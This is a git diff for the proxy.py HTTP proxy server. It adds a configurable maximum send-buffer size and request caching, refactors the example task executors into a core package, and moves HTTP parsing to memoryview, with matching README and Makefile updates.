diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml index 21b2f9943f..7b7eb48b51 100644 --- a/.pre-commit-config.yaml +++ b/.pre-commit-config.yaml @@ -125,8 +125,12 @@ repos: rev: v2.1.0 hooks: - id: codespell - exclude: >- - ^.+\.min\.js$ + exclude: > + (?x)^( + ^.+\.ipynb$| + tests/http/test_responses\.py| + ^.+\.min\.js$ + )$ - repo: https://github.com/adrienverge/yamllint.git rev: v1.26.2 diff --git a/Makefile b/Makefile index 51f12a4412..1a88722121 100644 --- a/Makefile +++ b/Makefile @@ -94,7 +94,7 @@ lib-clean: rm -rf .hypothesis # Doc RST files are cached and can cause issues # See https://github.com/abhinavsingh/proxy.py/issues/642#issuecomment-1003444578 - rm docs/pkg/*.rst + rm -f docs/pkg/*.rst lib-dep: pip install --upgrade pip && \ @@ -134,7 +134,7 @@ lib-doc: python -m tox -e build-docs && \ $(OPEN) .tox/build-docs/docs_out/index.html || true -lib-coverage: +lib-coverage: lib-clean pytest --cov=proxy --cov=tests --cov-report=html tests/ && \ $(OPEN) htmlcov/index.html || true diff --git a/README.md b/README.md index 273bb02418..e38d107c43 100644 --- a/README.md +++ b/README.md @@ -250,7 +250,7 @@ - See `--enable-static-server` and `--static-server-dir` flags - Optimized for large file uploads and downloads - - See `--client-recvbuf-size` and `--server-recvbuf-size` flag + - See `--client-recvbuf-size`, `--server-recvbuf-size`, `--max-sendbuf-size` flags - `IPv4` and `IPv6` support - See `--hostname` flag @@ -710,6 +710,8 @@ Start `proxy.py` as: --plugins proxy.plugin.CacheResponsesPlugin ``` +You may also use the `--cache-requests` flag to enable request packet caching for inspection. + Verify using `curl -v -x localhost:8899 http://httpbin.org/get`: ```console @@ -2278,13 +2280,14 @@ usage: -m [-h] [--tunnel-hostname TUNNEL_HOSTNAME] [--tunnel-port TUNNEL_PORT] [--work-klass WORK_KLASS] [--pid-file PID_FILE] [--enable-proxy-protocol] [--enable-conn-pool] [--key-file KEY_FILE] [--cert-file CERT_FILE] [--client-recvbuf-size CLIENT_RECVBUF_SIZE] - [--server-recvbuf-size SERVER_RECVBUF_SIZE] [--timeout TIMEOUT] + [--server-recvbuf-size SERVER_RECVBUF_SIZE] + [--max-sendbuf-size MAX_SENDBUF_SIZE] [--timeout TIMEOUT] [--disable-http-proxy] [--disable-headers DISABLE_HEADERS] [--ca-key-file CA_KEY_FILE] [--ca-cert-dir CA_CERT_DIR] [--ca-cert-file CA_CERT_FILE] [--ca-file CA_FILE] [--ca-signing-key-file CA_SIGNING_KEY_FILE] [--auth-plugin AUTH_PLUGIN] [--cache-dir CACHE_DIR] - [--proxy-pool PROXY_POOL] [--enable-web-server] + [--cache-requests] [--proxy-pool PROXY_POOL] [--enable-web-server] [--enable-static-server] [--static-server-dir STATIC_SERVER_DIR] [--min-compression-length MIN_COMPRESSION_LENGTH] [--enable-reverse-proxy] [--pac-file PAC_FILE] @@ -2294,7 +2297,7 @@ usage: -m [-h] [--tunnel-hostname TUNNEL_HOSTNAME] [--tunnel-port TUNNEL_PORT] [--filtered-client-ips FILTERED_CLIENT_IPS] [--filtered-url-regex-config FILTERED_URL_REGEX_CONFIG] -proxy.py v2.4.0rc8.dev17+g59a4335.d20220123 +proxy.py v2.4.0rc9.dev8+gea0253d.d20220126 options: -h, --help show this help message and exit @@ -2389,6 +2392,9 @@ options: --server-recvbuf-size SERVER_RECVBUF_SIZE Default: 128 KB. Maximum amount of data received from the server in a single recv() operation. + --max-sendbuf-size MAX_SENDBUF_SIZE + Default: 64 KB. Maximum amount of data to dispatch in + a single send() operation. --timeout TIMEOUT Default: 10.0. Number of seconds after which an inactive connection must be dropped. Inactivity is defined by no data sent or received by the client. 
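The new `--max-sendbuf-size` and `--cache-requests` flags documented in this README hunk can also be exercised from embedded mode. A minimal sketch, assuming `proxy.main()` accepts a CLI-style argument list as in the project's embedded-usage examples (flag values shown are illustrative, not requirements of this PR):

```python
import proxy

if __name__ == '__main__':
    # Cache request packets alongside responses via the cache plugin,
    # and cap each send() call at the new 64 KB default.
    proxy.main([
        '--plugins', 'proxy.plugin.CacheResponsesPlugin',
        '--cache-requests',
        '--max-sendbuf-size', str(64 * 1024),
    ])
```

Arguments passed this way go through the same `FlagParser` as the CLI, so the `curl -v -x localhost:8899 http://httpbin.org/get` verification shown earlier applies unchanged.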
@@ -2425,6 +2431,7 @@ options: Default: /Users/abhinavsingh/.proxy/cache. Flag only applicable when cache plugin is used with on-disk storage. + --cache-requests Default: False. Whether to also cache request packets. --proxy-pool PROXY_POOL List of upstream proxies to use in the pool --enable-web-server Default: False. Whether to enable diff --git a/examples/task.py b/examples/task.py index 67441d8239..9157225583 100644 --- a/examples/task.py +++ b/examples/task.py @@ -8,116 +8,64 @@ :copyright: (c) 2013-present by Abhinav Singh and contributors. :license: BSD, see LICENSE for more details. """ -import time +import sys import argparse -import threading -import multiprocessing -from typing import Any -from proxy.core.work import ( - Work, ThreadlessPool, BaseLocalExecutor, BaseRemoteExecutor, -) +from proxy.core.work import ThreadlessPool from proxy.common.flag import FlagParser -from proxy.common.backports import NonBlockingQueue - - -class Task: - """This will be our work object.""" - - def __init__(self, payload: bytes) -> None: - self.payload = payload - print(payload) - - -class TaskWork(Work[Task]): - """This will be our handler class, created for each received work.""" - - @staticmethod - def create(*args: Any) -> Task: - """Work core doesn't know how to create work objects for us, so - we must provide an implementation of create method here.""" - return Task(*args) - - -class LocalTaskExecutor(BaseLocalExecutor): - """We'll define a local executor which is capable of receiving - log lines over a non blocking queue.""" - - def work(self, *args: Any) -> None: - task_id = int(time.time()) - uid = '%s-%s' % (self.iid, task_id) - self.works[task_id] = self.create(uid, *args) - - -class RemoteTaskExecutor(BaseRemoteExecutor): - - def work(self, *args: Any) -> None: - task_id = int(time.time()) - uid = '%s-%s' % (self.iid, task_id) - self.works[task_id] = self.create(uid, *args) - - -def start_local(flags: argparse.Namespace) -> None: - work_queue = NonBlockingQueue() - executor = LocalTaskExecutor(iid=1, work_queue=work_queue, flags=flags) +from proxy.core.work.task import ( + RemoteTaskExecutor, ThreadedTaskExecutor, SingleProcessTaskExecutor, +) - t = threading.Thread(target=executor.run) - t.daemon = True - t.start() - try: +def start_local_thread(flags: argparse.Namespace) -> None: + with ThreadedTaskExecutor(flags=flags) as thread: i = 0 while True: - work_queue.put(('%d' % i).encode('utf-8')) + thread.executor.work_queue.put(('%d' % i).encode('utf-8')) i += 1 - except KeyboardInterrupt: - pass - finally: - executor.running.set() - t.join() -def start_remote(flags: argparse.Namespace) -> None: - pipe = multiprocessing.Pipe() - work_queue = pipe[0] - executor = RemoteTaskExecutor(iid=1, work_queue=pipe[1], flags=flags) +def start_remote_process(flags: argparse.Namespace) -> None: + with SingleProcessTaskExecutor(flags=flags) as process: + i = 0 + while True: + process.work_queue.send(('%d' % i).encode('utf-8')) + i += 1 - p = multiprocessing.Process(target=executor.run) - p.daemon = True - p.start() - try: +def start_remote_pool(flags: argparse.Namespace) -> None: + with ThreadlessPool(flags=flags, executor_klass=RemoteTaskExecutor) as pool: i = 0 while True: + work_queue = pool.work_queues[i % flags.num_workers] work_queue.send(('%d' % i).encode('utf-8')) i += 1 - except KeyboardInterrupt: - pass - finally: - executor.running.set() - p.join() -def start_remote_pool(flags: argparse.Namespace) -> None: - with ThreadlessPool(flags=flags, executor_klass=RemoteTaskExecutor) as pool: - 
try: - i = 0 - while True: - work_queue = pool.work_queues[i % flags.num_workers] - work_queue.send(('%d' % i).encode('utf-8')) - i += 1 - except KeyboardInterrupt: - pass +def main() -> None: + try: + flags = FlagParser.initialize( + sys.argv[2:] + ['--disable-http-proxy'], + work_klass='proxy.core.work.task.TaskHandler', + ) + globals()['start_%s' % sys.argv[1]](flags) + except KeyboardInterrupt: + pass # TODO: TaskWork, LocalTaskExecutor, RemoteTaskExecutor # should not be needed, abstract those pieces out in the core # for stateless tasks. if __name__ == '__main__': - flags = FlagParser.initialize( - ['--disable-http-proxy'], - work_klass=TaskWork, - ) - start_remote_pool(flags) - # start_remote(flags) - # start_local(flags) + if len(sys.argv) < 2: + print( + '\n'.join([ + 'Usage:', + ' %s <execution-mode>' % sys.argv[0], + ' execution-mode can be one of the following:', + ' "remote_pool", "remote_process", "local_thread"', + ]), + ) + sys.exit(1) + main() diff --git a/proxy/common/constants.py b/proxy/common/constants.py index 3ec1acb758..90d7243624 100644 --- a/proxy/common/constants.py +++ b/proxy/common/constants.py @@ -74,6 +74,7 @@ def _env_threadless_compliant() -> bool: # Defaults DEFAULT_BACKLOG = 100 DEFAULT_BASIC_AUTH = None +DEFAULT_MAX_SEND_SIZE = 64 * 1024 DEFAULT_BUFFER_SIZE = 128 * 1024 DEFAULT_CA_CERT_DIR = None DEFAULT_CA_CERT_FILE = None @@ -124,14 +125,13 @@ def _env_threadless_compliant() -> bool: DEFAULT_PORT = 8899 DEFAULT_SERVER_RECVBUF_SIZE = DEFAULT_BUFFER_SIZE DEFAULT_STATIC_SERVER_DIR = os.path.join(PROXY_PY_DIR, "public") -DEFAULT_MIN_COMPRESSION_LIMIT = 20 # In bytes +DEFAULT_MIN_COMPRESSION_LENGTH = 20 # In bytes DEFAULT_THREADLESS = _env_threadless_compliant() DEFAULT_LOCAL_EXECUTOR = True DEFAULT_TIMEOUT = 10.0 DEFAULT_VERSION = False DEFAULT_HTTP_PORT = 80 DEFAULT_HTTPS_PORT = 443 -DEFAULT_MAX_SEND_SIZE = 16 * 1024 DEFAULT_WORK_KLASS = 'proxy.http.HttpProtocolHandler' DEFAULT_ENABLE_PROXY_PROTOCOL = False # 25 milliseconds to keep the loops hot @@ -148,6 +148,7 @@ def _env_threadless_compliant() -> bool: DEFAULT_CACHE_DIRECTORY_PATH = os.path.join( DEFAULT_DATA_DIRECTORY_PATH, 'cache', ) +DEFAULT_CACHE_REQUESTS = False # Core plugins enabled by default or via flags DEFAULT_ABC_PLUGINS = [ diff --git a/proxy/common/flag.py b/proxy/common/flag.py index 35849d2dc6..f74acc0ddd 100644 --- a/proxy/common/flag.py +++ b/proxy/common/flag.py @@ -30,7 +30,7 @@ PLUGIN_REVERSE_PROXY, DEFAULT_NUM_ACCEPTORS, PLUGIN_INSPECT_TRAFFIC, DEFAULT_DISABLE_HEADERS, PY2_DEPRECATION_MESSAGE, DEFAULT_DEVTOOLS_WS_PATH, PLUGIN_DEVTOOLS_PROTOCOL, PLUGIN_WEBSOCKET_TRANSPORT, - DEFAULT_DATA_DIRECTORY_PATH, DEFAULT_MIN_COMPRESSION_LIMIT, + DEFAULT_DATA_DIRECTORY_PATH, DEFAULT_MIN_COMPRESSION_LENGTH, ) @@ -335,13 +335,13 @@ def initialize( args.static_server_dir, ), ) - args.min_compression_limit = cast( + args.min_compression_length = cast( bool, opts.get( - 'min_compression_limit', + 'min_compression_length', getattr( - args, 'min_compression_limit', - DEFAULT_MIN_COMPRESSION_LIMIT, + args, 'min_compression_length', + DEFAULT_MIN_COMPRESSION_LENGTH, ), ), ) diff --git a/proxy/common/utils.py b/proxy/common/utils.py index 324dc16575..d157775d7f 100644 --- a/proxy/common/utils.py +++ b/proxy/common/utils.py @@ -26,7 +26,7 @@ from .types import HostPort from .constants import ( CRLF, COLON, HTTP_1_1, IS_WINDOWS, WHITESPACE, DEFAULT_TIMEOUT, - DEFAULT_THREADLESS, + DEFAULT_THREADLESS, PROXY_AGENT_HEADER_VALUE, ) @@ -84,14 +84,30 @@ def bytes_(s: Any, encoding: str = 'utf-8', errors: str = 'strict') ->
Any: def build_http_request( method: bytes, url: bytes, protocol_version: bytes = HTTP_1_1, + content_type: Optional[bytes] = None, headers: Optional[Dict[bytes, bytes]] = None, body: Optional[bytes] = None, conn_close: bool = False, + no_ua: bool = False, ) -> bytes: """Build and returns a HTTP request packet.""" + headers = headers or {} + if content_type is not None: + headers[b'Content-Type'] = content_type + has_transfer_encoding = False + has_user_agent = False + for k, _ in headers.items(): + if k.lower() == b'transfer-encoding': + has_transfer_encoding = True + elif k.lower() == b'user-agent': + has_user_agent = True + if body and not has_transfer_encoding: + headers[b'Content-Length'] = bytes_(len(body)) + if not has_user_agent and not no_ua: + headers[b'User-Agent'] = PROXY_AGENT_HEADER_VALUE return build_http_pkt( [method, url, protocol_version], - headers or {}, + headers, body, conn_close, ) @@ -109,19 +125,14 @@ def build_http_response( line = [protocol_version, bytes_(status_code)] if reason: line.append(reason) - if headers is None: - headers = {} - has_content_length = False + headers = headers or {} has_transfer_encoding = False for k, _ in headers.items(): - if k.lower() == b'content-length': - has_content_length = True if k.lower() == b'transfer-encoding': has_transfer_encoding = True - if body is not None and \ - not has_transfer_encoding and \ - not has_content_length: - headers[b'Content-Length'] = bytes_(len(body)) + break + if not has_transfer_encoding: + headers[b'Content-Length'] = bytes_(len(body)) if body else b'0' return build_http_pkt(line, headers, body, conn_close) diff --git a/proxy/core/acceptor/acceptor.py b/proxy/core/acceptor/acceptor.py index 0df4c2a555..299c0efbd0 100644 --- a/proxy/core/acceptor/acceptor.py +++ b/proxy/core/acceptor/acceptor.py @@ -178,6 +178,7 @@ def run(self) -> None: for fileno in self.socks: self.socks[fileno].close() self.socks.clear() + self.selector.close() logger.debug('Acceptor#%d shutdown', self.idd) def _recv_and_setup_socks(self) -> None: @@ -207,7 +208,8 @@ def _start_local(self) -> None: self._lthread.start() def _stop_local(self) -> None: - if self._lthread is not None and self._local_work_queue is not None: + if self._lthread is not None and \ + self._local_work_queue is not None: self._local_work_queue.put(False) self._lthread.join() diff --git a/proxy/core/base/tcp_server.py b/proxy/core/base/tcp_server.py index dfc368f461..8d9b5cf74c 100644 --- a/proxy/core/base/tcp_server.py +++ b/proxy/core/base/tcp_server.py @@ -27,7 +27,8 @@ from ...core.connection import TcpClientConnection from ...common.constants import ( DEFAULT_TIMEOUT, DEFAULT_KEY_FILE, DEFAULT_CERT_FILE, - DEFAULT_CLIENT_RECVBUF_SIZE, DEFAULT_SERVER_RECVBUF_SIZE, + DEFAULT_MAX_SEND_SIZE, DEFAULT_CLIENT_RECVBUF_SIZE, + DEFAULT_SERVER_RECVBUF_SIZE, ) @@ -68,6 +69,14 @@ 'server in a single recv() operation.', ) +flags.add_argument( + '--max-sendbuf-size', + type=int, + default=DEFAULT_MAX_SEND_SIZE, + help='Default: ' + str(int(DEFAULT_MAX_SEND_SIZE / 1024)) + + ' KB. 
Maximum amount of data to dispatch in a single send() operation.', +) + flags.add_argument( '--timeout', type=int, @@ -164,7 +173,7 @@ async def handle_writables(self, writables: Writables) -> bool: logger.debug( 'Flushing buffer to client {0}'.format(self.work.address), ) - self.work.flush() + self.work.flush(self.flags.max_sendbuf_size) if self.must_flush_before_shutdown is True and \ not self.work.has_buffer(): teardown = True diff --git a/proxy/core/base/tcp_tunnel.py b/proxy/core/base/tcp_tunnel.py index fedeac2190..7b28fbec7d 100644 --- a/proxy/core/base/tcp_tunnel.py +++ b/proxy/core/base/tcp_tunnel.py @@ -89,7 +89,7 @@ async def handle_events( return do_shutdown # Handle server events if self.upstream and self.upstream.connection.fileno() in readables: - data = self.upstream.recv() + data = self.upstream.recv(self.flags.server_recvbuf_size) if data is None: # Server closed connection logger.debug('Connection closed by server') @@ -97,7 +97,7 @@ async def handle_events( # tunnel data to client self.work.queue(data) if self.upstream and self.upstream.connection.fileno() in writables: - self.upstream.flush() + self.upstream.flush(self.flags.max_sendbuf_size) return False def connect_upstream(self) -> None: diff --git a/proxy/core/base/tcp_upstream.py b/proxy/core/base/tcp_upstream.py index f045f1f9fe..31a0657201 100644 --- a/proxy/core/base/tcp_upstream.py +++ b/proxy/core/base/tcp_upstream.py @@ -75,19 +75,18 @@ async def read_from_descriptors(self, r: Readables) -> bool: self.upstream.connection.fileno() in r: try: raw = self.upstream.recv(self.server_recvbuf_size) - if raw is not None: - self.total_size += len(raw) - self.handle_upstream_data(raw) - else: + if raw is None: # pragma: no cover # Tear down because upstream proxy closed the connection return True - except TimeoutError: + self.total_size += len(raw) + self.handle_upstream_data(raw) + except TimeoutError: # pragma: no cover logger.info('Upstream recv timeout error') return True - except ssl.SSLWantReadError: + except ssl.SSLWantReadError: # pragma: no cover logger.info('Upstream SSLWantReadError, will retry') return False - except ConnectionResetError: + except ConnectionResetError: # pragma: no cover logger.debug('Connection reset by upstream') return True return False @@ -97,11 +96,12 @@ async def write_to_descriptors(self, w: Writables) -> bool: self.upstream.connection.fileno() in w and \ self.upstream.has_buffer(): try: + # TODO: max sendbuf size flag currently not used here self.upstream.flush() - except ssl.SSLWantWriteError: + except ssl.SSLWantWriteError: # pragma: no cover logger.info('Upstream SSLWantWriteError, will retry') return False - except BrokenPipeError: + except BrokenPipeError: # pragma: no cover logger.debug('BrokenPipeError when flushing to upstream') return True return False diff --git a/proxy/core/connection/connection.py b/proxy/core/connection/connection.py index cddf585a11..a8c090d137 100644 --- a/proxy/core/connection/connection.py +++ b/proxy/core/connection/connection.py @@ -10,7 +10,7 @@ """ import logging from abc import ABC, abstractmethod -from typing import List, Optional +from typing import List, Union, Optional from .types import tcpConnectionTypes from ...common.types import TcpOrTlsSocket @@ -47,7 +47,7 @@ def connection(self) -> TcpOrTlsSocket: """Must return the socket connection to use in this class.""" raise TcpConnectionUninitializedException() # pragma: no cover - def send(self, data: bytes) -> int: + def send(self, data: Union[memoryview, bytes]) -> int: """Users must 
handle BrokenPipeError exceptions""" # logger.info(data) return self.connection.send(data) @@ -79,17 +79,20 @@ def queue(self, mv: memoryview) -> None: self.buffer.append(mv) self._num_buffer += 1 - def flush(self) -> int: + def flush(self, max_send_size: Optional[int] = None) -> int: """Users must handle BrokenPipeError exceptions""" if not self.has_buffer(): return 0 - mv = self.buffer[0].tobytes() - sent: int = self.send(mv[:DEFAULT_MAX_SEND_SIZE]) + mv = self.buffer[0] + # TODO: Assemble multiple packets if total + # size remains below max send size. + max_send_size = max_send_size or DEFAULT_MAX_SEND_SIZE + sent: int = self.send(mv[:max_send_size]) if sent == len(mv): self.buffer.pop(0) self._num_buffer -= 1 else: - self.buffer[0] = memoryview(mv[sent:]) + self.buffer[0] = mv[sent:] del mv logger.debug('flushed %d bytes to %s' % (sent, self.tag)) return sent diff --git a/proxy/core/connection/server.py b/proxy/core/connection/server.py index 83ad0ae557..d8e8ecfb69 100644 --- a/proxy/core/connection/server.py +++ b/proxy/core/connection/server.py @@ -43,7 +43,12 @@ def connect( ) self.closed = False - def wrap(self, hostname: str, ca_file: Optional[str] = None) -> None: + def wrap( + self, + hostname: str, + ca_file: Optional[str] = None, + as_non_blocking: bool = False, + ) -> None: ctx = ssl.create_default_context( ssl.Purpose.SERVER_AUTH, cafile=ca_file, ) @@ -54,4 +59,5 @@ def wrap(self, hostname: str, ca_file: Optional[str] = None) -> None: self.connection, server_hostname=hostname, ) - self.connection.setblocking(False) + if as_non_blocking: + self.connection.setblocking(False) diff --git a/proxy/core/work/task/__init__.py b/proxy/core/work/task/__init__.py new file mode 100644 index 0000000000..157ae566d9 --- /dev/null +++ b/proxy/core/work/task/__init__.py @@ -0,0 +1,24 @@ +# -*- coding: utf-8 -*- +""" + proxy.py + ~~~~~~~~ + ⚡⚡⚡ Fast, Lightweight, Pluggable, TLS interception capable proxy server focused on + Network monitoring, controls & Application development, testing, debugging. + + :copyright: (c) 2013-present by Abhinav Singh and contributors. + :license: BSD, see LICENSE for more details. +""" +from .task import Task +from .local import LocalTaskExecutor, ThreadedTaskExecutor +from .remote import RemoteTaskExecutor, SingleProcessTaskExecutor +from .handler import TaskHandler + + +__all__ = [ + 'Task', + 'TaskHandler', + 'LocalTaskExecutor', + 'ThreadedTaskExecutor', + 'RemoteTaskExecutor', + 'SingleProcessTaskExecutor', +] diff --git a/proxy/core/work/task/handler.py b/proxy/core/work/task/handler.py new file mode 100644 index 0000000000..5fd78e3833 --- /dev/null +++ b/proxy/core/work/task/handler.py @@ -0,0 +1,25 @@ +# -*- coding: utf-8 -*- +""" + proxy.py + ~~~~~~~~ + ⚡⚡⚡ Fast, Lightweight, Pluggable, TLS interception capable proxy server focused on + Network monitoring, controls & Application development, testing, debugging. + + :copyright: (c) 2013-present by Abhinav Singh and contributors. + :license: BSD, see LICENSE for more details. +""" +from typing import Any + +from .task import Task +from ..work import Work + + +class TaskHandler(Work[Task]): + """Task handler.""" + + @staticmethod + def create(*args: Any) -> Task: + """Work core doesn't know how to create work objects for us. 
+ Example, for task module scenario, it doesn't know how to create + Task objects for us.""" + return Task(*args) diff --git a/proxy/core/work/task/local.py b/proxy/core/work/task/local.py new file mode 100644 index 0000000000..a2642b23fa --- /dev/null +++ b/proxy/core/work/task/local.py @@ -0,0 +1,50 @@ +# -*- coding: utf-8 -*- +""" + proxy.py + ~~~~~~~~ + ⚡⚡⚡ Fast, Lightweight, Pluggable, TLS interception capable proxy server focused on + Network monitoring, controls & Application development, testing, debugging. + + :copyright: (c) 2013-present by Abhinav Singh and contributors. + :license: BSD, see LICENSE for more details. +""" +import time +import uuid +import threading +from typing import Any + +from ..local import BaseLocalExecutor +from ....common.backports import NonBlockingQueue + + +class LocalTaskExecutor(BaseLocalExecutor): + """We'll define a local executor which is capable of receiving + task payloads over a non-blocking queue.""" + + def work(self, *args: Any) -> None: + task_id = int(time.time()) + uid = '%s-%s' % (self.iid, task_id) + self.works[task_id] = self.create(uid, *args) + + +class ThreadedTaskExecutor(threading.Thread): + + def __init__(self, **kwargs: Any) -> None: + super().__init__() + self.daemon = True + self.executor = LocalTaskExecutor( + iid=uuid.uuid4().hex, + work_queue=NonBlockingQueue(), + **kwargs, + ) + + def __enter__(self) -> 'ThreadedTaskExecutor': + self.start() + return self + + def __exit__(self, *args: Any) -> None: + self.executor.running.set() + self.join() + + def run(self) -> None: + self.executor.run() diff --git a/proxy/core/work/task/remote.py b/proxy/core/work/task/remote.py new file mode 100644 index 0000000000..ce4b0009df --- /dev/null +++ b/proxy/core/work/task/remote.py @@ -0,0 +1,48 @@ +# -*- coding: utf-8 -*- +""" + proxy.py + ~~~~~~~~ + ⚡⚡⚡ Fast, Lightweight, Pluggable, TLS interception capable proxy server focused on + Network monitoring, controls & Application development, testing, debugging. + + :copyright: (c) 2013-present by Abhinav Singh and contributors. + :license: BSD, see LICENSE for more details. +""" +import time +import uuid +import multiprocessing +from typing import Any + +from ..remote import BaseRemoteExecutor + + +class RemoteTaskExecutor(BaseRemoteExecutor): + + def work(self, *args: Any) -> None: + task_id = int(time.time()) + uid = '%s-%s' % (self.iid, task_id) + self.works[task_id] = self.create(uid, *args) + + +class SingleProcessTaskExecutor(multiprocessing.Process): + + def __init__(self, **kwargs: Any) -> None: + super().__init__() + self.daemon = True + self.work_queue, remote = multiprocessing.Pipe() + self.executor = RemoteTaskExecutor( + iid=uuid.uuid4().hex, + work_queue=remote, + **kwargs, + ) + + def __enter__(self) -> 'SingleProcessTaskExecutor': + self.start() + return self + + def __exit__(self, *args: Any) -> None: + self.executor.running.set() + self.join() + + def run(self) -> None: + self.executor.run() diff --git a/proxy/core/work/task/task.py b/proxy/core/work/task/task.py new file mode 100644 index 0000000000..f4467ef2c8 --- /dev/null +++ b/proxy/core/work/task/task.py @@ -0,0 +1,18 @@ +# -*- coding: utf-8 -*- +""" + proxy.py + ~~~~~~~~ + ⚡⚡⚡ Fast, Lightweight, Pluggable, TLS interception capable proxy server focused on + Network monitoring, controls & Application development, testing, debugging. + + :copyright: (c) 2013-present by Abhinav Singh and contributors. + :license: BSD, see LICENSE for more details.
+""" + + +class Task: + """Task object which knows how to process the payload.""" + + def __init__(self, payload: bytes) -> None: + self.payload = payload + print(payload) diff --git a/proxy/core/work/threadless.py b/proxy/core/work/threadless.py index 1ad84ac645..f43c0a4732 100644 --- a/proxy/core/work/threadless.py +++ b/proxy/core/work/threadless.py @@ -419,6 +419,7 @@ def run(self) -> None: if wqfileno is not None: self.selector.unregister(wqfileno) self.close_work_queue() + self.selector.close() assert self.loop is not None self.loop.run_until_complete(self.loop.shutdown_asyncgens()) self.loop.close() diff --git a/proxy/dashboard/dashboard.py b/proxy/dashboard/dashboard.py index 411c153b60..b5548ea524 100644 --- a/proxy/dashboard/dashboard.py +++ b/proxy/dashboard/dashboard.py @@ -13,9 +13,7 @@ from typing import List, Tuple from ..http.parser import HttpParser -from ..http.server import ( - HttpWebServerPlugin, HttpWebServerBasePlugin, httpProtocolTypes, -) +from ..http.server import HttpWebServerBasePlugin, httpProtocolTypes from ..http.responses import permanentRedirectResponse @@ -46,11 +44,12 @@ def routes(self) -> List[Tuple[int, str]]: def handle_request(self, request: HttpParser) -> None: if request.path == b'/dashboard/': self.client.queue( - HttpWebServerPlugin.read_and_build_static_file_response( + self.serve_static_file( os.path.join( self.flags.static_server_dir, 'dashboard', 'proxy.html', ), + self.flags.min_compression_length, ), ) elif request.path in ( diff --git a/proxy/http/handler.py b/proxy/http/handler.py index dc2d7cfbf1..c8d070411c 100644 --- a/proxy/http/handler.py +++ b/proxy/http/handler.py @@ -163,9 +163,7 @@ def handle_data(self, data: memoryview) -> Optional[bool]: self.work.closed = True return True try: - # Don't parse incoming data any further after 1st request has completed. - # - # This specially does happen for pipeline requests. + # We don't parse incoming data any further after 1st HTTP request packet.
# # Plugins can utilize on_client_data for such cases and # apply custom logic to handle request data sent after 1st @@ -173,11 +171,10 @@ def handle_data(self, data: memoryview) -> Optional[bool]: if self.request.state != httpParserStates.COMPLETE: if self._parse_first_request(data): return True - else: - # HttpProtocolHandlerPlugin.on_client_data - # Can raise HttpProtocolException to tear down the connection - if self.plugin: - data = self.plugin.on_client_data(data) or data + # HttpProtocolHandlerPlugin.on_client_data + # Can raise HttpProtocolException to tear down the connection + elif self.plugin: + self.plugin.on_client_data(data) except HttpProtocolException as e: logger.info('HttpProtocolException: %s' % e) response: Optional[memoryview] = e.response(self.request) @@ -270,11 +267,8 @@ def _discover_plugin_klass(self, protocol: int) -> Optional[Type['HttpProtocolHa def _parse_first_request(self, data: memoryview) -> bool: # Parse http request - # - # TODO(abhinavsingh): Remove .tobytes after parser is - # memoryview compliant try: - self.request.parse(data.tobytes()) + self.request.parse(data) except HttpProtocolException as e: # noqa: WPS329 self.work.queue(BAD_REQUEST_RESPONSE_PKT) raise e @@ -351,6 +345,8 @@ def run(self) -> None: ) finally: self.shutdown() + if self.selector: + self.selector.close() loop.close() async def _run_once(self) -> bool: @@ -397,7 +393,7 @@ def _flush(self) -> None: ] = self.selector.select(timeout=DEFAULT_SELECTOR_SELECT_TIMEOUT) if len(ev) == 0: continue - self.work.flush() + self.work.flush(self.flags.max_sendbuf_size) except BrokenPipeError: pass finally: diff --git a/proxy/http/parser/chunk.py b/proxy/http/parser/chunk.py index 691117926d..eb35798955 100644 --- a/proxy/http/parser/chunk.py +++ b/proxy/http/parser/chunk.py @@ -34,13 +34,13 @@ def __init__(self) -> None: # Expected size of next following chunk self.size: Optional[int] = None - def parse(self, raw: bytes) -> bytes: + def parse(self, raw: memoryview) -> memoryview: more = len(raw) > 0 while more and self.state != chunkParserStates.COMPLETE: - more, raw = self.process(raw) + more, raw = self.process(raw.tobytes()) return raw - def process(self, raw: bytes) -> Tuple[bool, bytes]: + def process(self, raw: bytes) -> Tuple[bool, memoryview]: if self.state == chunkParserStates.WAITING_FOR_SIZE: # Consume prior chunk in buffer # in case chunk size without CRLF was received @@ -69,7 +69,7 @@ def process(self, raw: bytes) -> Tuple[bool, bytes]: self.state = chunkParserStates.WAITING_FOR_SIZE self.chunk = b'' self.size = None - return len(raw) > 0, raw + return len(raw) > 0, memoryview(raw) @staticmethod def to_chunks(raw: bytes, chunk_size: int = DEFAULT_BUFFER_SIZE) -> bytes: diff --git a/proxy/http/parser/parser.py b/proxy/http/parser/parser.py index 6573cabaf6..4877667229 100644 --- a/proxy/http/parser/parser.py +++ b/proxy/http/parser/parser.py @@ -77,7 +77,7 @@ def __init__( # Total size of raw bytes passed for parsing self.total_size: int = 0 # Buffer to hold unprocessed bytes - self.buffer: bytes = b'' + self.buffer: Optional[memoryview] = None # Internal headers data structure: # - Keys are lower case header names. 
# - Values are 2-tuple containing original @@ -102,19 +102,19 @@ def request( httpParserTypes.REQUEST_PARSER, enable_proxy_protocol=enable_proxy_protocol, ) - parser.parse(raw) + parser.parse(memoryview(raw)) return parser @classmethod def response(cls: Type[T], raw: bytes) -> T: parser = cls(httpParserTypes.RESPONSE_PARSER) - parser.parse(raw) + parser.parse(memoryview(raw)) return parser def header(self, key: bytes) -> bytes: """Convenient method to return original header value from internal data structure.""" if self.headers is None or key.lower() not in self.headers: - raise KeyError('%s not found in headers', text_(key)) + raise KeyError('%s not found in headers' % text_(key)) return self.headers[key.lower()][1] def has_header(self, key: bytes) -> bool: @@ -206,14 +206,21 @@ def body_expected(self) -> bool: """Returns true if content or chunked response is expected.""" return self._content_expected or self._is_chunked_encoded - def parse(self, raw: bytes, allowed_url_schemes: Optional[List[bytes]] = None) -> None: + def parse( + self, + raw: memoryview, + allowed_url_schemes: Optional[List[bytes]] = None, + ) -> None: """Parses HTTP request out of raw bytes. Check for `HttpParser.state` after `parse` has successfully returned.""" size = len(raw) self.total_size += size - raw = self.buffer + raw - self.buffer, more = b'', size > 0 + if self.buffer: + # TODO(abhinavsingh): Instead of tobytes our parser + # must be capable of working with arrays of memoryview + raw = memoryview(self.buffer.tobytes() + raw.tobytes()) + self.buffer, more = None, size > 0 while more and self.state != httpParserStates.COMPLETE: # gte with HEADERS_COMPLETE also encapsulated RCVING_BODY state if self.state >= httpParserStates.HEADERS_COMPLETE: @@ -237,7 +244,7 @@ def parse(self, raw: bytes, allowed_url_schemes: Optional[List[bytes]] = None) - not (self._content_expected or self._is_chunked_encoded) and \ raw == b'': self.state = httpParserStates.COMPLETE - self.buffer = raw + self.buffer = None if raw == b'' else raw def build(self, disable_headers: Optional[List[bytes]] = None, 